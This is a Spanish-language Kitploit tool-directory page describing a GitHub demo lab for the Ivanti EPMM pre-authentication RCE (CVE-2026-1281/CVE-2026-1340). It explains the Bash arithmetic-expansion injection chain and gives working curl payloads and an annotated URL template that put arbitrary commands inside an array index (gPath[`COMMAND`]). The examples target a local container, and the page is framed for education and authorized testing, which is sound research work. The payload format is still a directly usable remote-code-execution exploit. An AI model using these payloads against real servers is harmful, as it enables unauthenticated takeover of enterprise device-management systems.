Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE — Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad RCE de pre-autenticación en Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad. | Kitploit
Herramientas/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad RCE de pre-autenticación en Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad.

Ver Repositorio
312hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Objetivo Dummy de RCE pre-auth de Ivanti EPMM

Una aplicación de demostración simple que muestra cómo reproducir la vulnerabilidad de RCE pre-auth de Ivanti EPMM (CVE-2026-1281 / CVE-2026-1340) con fines educativos y de investigación en seguridad.

Resumen de la Vulnerabilidad

Esta vulnerabilidad explota el comportamiento de la expansión aritmética de Bash. Cuando una variable que contiene una referencia a otra variable se usa en un contexto aritmético, y esa variable referenciada contiene un índice de array con sustitución de comandos, el comando se ejecuta.

La Cadena de Explotación

  1. La solicitud contiene st=theValue (cadena literal "theValue" con relleno)
  2. La solicitud contiene h=gPath[\comando`]` (comando en el índice del array)
  3. El script Bash analiza los pares clave=valor en un bucle, actualizando theValue en cada iteración
  4. gStartTime se establece en la cadena literal "theValue"
  5. Después del bucle, theValue contiene gPath[\comando`]`
  6. Cuando se evalúa [[ ${currentTime} -gt ${gStartTime} ]]:
    • ${gStartTime} → "theValue" (cadena)
    • El contexto aritmético trata theValue como referencia a variable
    • theValue → gPath[\comando`]`
    • El índice del array activa la sustitución de comandos → ¡RCE!

Inicio Rápido

# Construir e iniciar el contenedor
docker-compose up --build -d

# Verificar que está en ejecución
curl http://localhost:8180/health

Probando la Vulnerabilidad

1. Prueba de Creación de Archivo

Crea un archivo para demostrar la ejecución de comandos:

# Payload codificado en URL: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Verificar si el archivo fue creado
cat artifacts/poc

2. Prueba Basada en Tiempo

Verifica con un comando sleep:

# Debería tardar ~5 segundos en responder
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. Ejecución de Comando Personalizado

# Escribir contenido personalizado
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

Estructura de la URL

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMANDO%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ Payload: gPath[`COMANDO`]
                               │      │              └─ Marca de tiempo final (cualquier 10 dígitos)
                               │      └─ CRÍTICO: "theValue" literal + 2 espacios (10 caracteres en total)
                               └─ Índice de clave (cualquier valor)

Depuración

# Ver los registros del contenedor
docker-compose logs -f

# Obtener un shell en el contenedor
docker exec -it ivanti-epmm-vuln /bin/bash

# Ver los registros de error de nginx
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

Limpieza

docker-compose down
rm -rf artifacts/*

Referencias

  • Publicación del Blog de WatchTowr Labs

Aviso Legal

Esto es solo para fines educativos y de pruebas de seguridad autorizadas. No lo utilices contra sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de prueba.

Descargar herramienta